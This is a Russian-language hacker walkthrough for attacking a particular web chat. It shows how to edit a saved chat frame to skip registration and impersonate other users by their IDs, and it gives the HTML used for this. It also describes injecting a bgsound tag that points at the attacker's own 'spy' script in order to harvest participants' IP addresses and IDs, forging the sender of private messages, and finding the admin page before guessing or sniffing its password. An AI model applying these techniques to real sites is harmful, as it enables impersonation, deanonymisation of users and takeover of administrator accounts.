В любом чате, фрейм в котором вы пишите сообщение, генерируется динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа < input tupe = hidden name cookie value = SP 202134> так хранится UserID – как мне кажется это как бы номер юзера который сейчас сидит в чате).
Идея в следующим: сохраняем содержимое этого фрейма на диске и исправляем его так чтобы с ним можно было работать со своего винта. Т.е заменяем ссылкой типа “ cgi - bin / refresh . pl на полный путь www . chat . nsk . su / cgi - bin / refresh . pl вместо скрытых полей формы пишем типа <input tupe text=mame= cookie value = sp 202134> (что бы можно было их изменять) После делаем html документ для <сборки чата> из кусков, т.е примерно так:
“First. Htm”
<html>
<frameset rows=”80%, 20%”>
<frameset cols=”70%, 30%”>
<frame name=”razg” src= www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+nocookie#end >
<frame name=”rigt” src= http://www.chat.nsk.su/right.html >
</frameset>
<frame name=”bot” src=”start.htm”>
</frameset>
</html>
Strt . htm – это и есть тот фрейм который мы сохранили и изменили.
После этого просто браузером открываем страницу ( FIRST . HTM ). И сразу (!!!) попадем в чат минуя страницу регистрации для входа.
Это позволит :
• Обходить зарегистрированные имена.
• Спрятать свой ипэшник от киллеров, за счёт взятия чужого ID ' a
На этом я мог бы и остановится, но я продолжу.
Дальше интересно вычислить IP участников. Если не запрещен тег < bgsound src =”>, то это нам позволит вставлять в своё сообщение ресурс со своей машины. Сам по себе звук не нужен, но этот касяк позволит вставить в свой месс строку типа <bgsound src= http :// MayIP / cgi - bin / spy . exe ”>. Этот скрипт ( spy . exe ) вызывался с компа каждого участника чата. Это позволит увидеть IP всех (скрипт просто сохраняет на винте данные из переменной окружения REMOTE _ ADDR ). Примерно в это же время в чате появились приваты. Это значит что в главном фрейме (тот где все балаблаки) стал называться по другому.
До приватов:
www . chat . nsk . su / cgi - bin / refresh . cgi ? win + razgovor # end
После появления приватов:
www . chat . nsk . su / cgi - bin / refresh . cgi ? win + razgovor + SP 345678# end
где SP 456789 – UserID
После этого в скрипте ( spy . exe ) был добавлен вывод ID ' a из переменно окружения HTTP _ REFERER . Ну а сопоставить ник с ID 'ом не проблемма, т.к ID каждого прописан там же, примерно в такой строке .
<br><b><font color=yellow size=-1> ТУТ НИК </font></b>
<font color=black><a href=”/cgi-bin/private_form.cgi?sp448188”>
<img src=/img/mes.gif border=0 vspace=0></a></font>
(эта строка взята из правого фрейма, где можно вызвать функцию “кто в чате”)
После этого перестало быть проблемой сопоставление Ника и ip . Затем можно позабавится с приватами.
Используя метод сохранения странички на винте, можно получить форму для отправления приватов от кого-то кому-то. Т.е можно в отсылаемом приватном сообщении проставлять имя отправителя.
Осталось тоько одно. Известно что чате есть киллер, но ничего о нём не известно. Известно только то чтобы киллерствовать надо зайт на какую – то страничку. Очевидно что в этой киллерской странички показываются имена. Предположим, что имя показывается таким каким его выводят. Исходя из этого, под именем < bgsound src =” http :// myip / cgi - bin / spy . exe ”.> maynik зашол в чат (через прокси) и начал легонько ругается (надо было, киллеры зашли на свою страничку ). После этого изучив лог нашего вебсервера ( omniHTTPd beta ), можно увидеть там обращение со странице, не относящим к нам известным страницам чата. Лезим на страницу и получаем запрос на ввод пароля, со словами “дорогой администратор”. Это приятно греет душу. Дальше можно подбрать пароль или ещё что придумать. Но ситуация сложилась так, что мы оказались в одной сете с киллером и запустили к нему снифир, мы получаем пароль. Усё.
Перепечатка документа разрешается, но с ведома админа сайта Sul_a@list.ru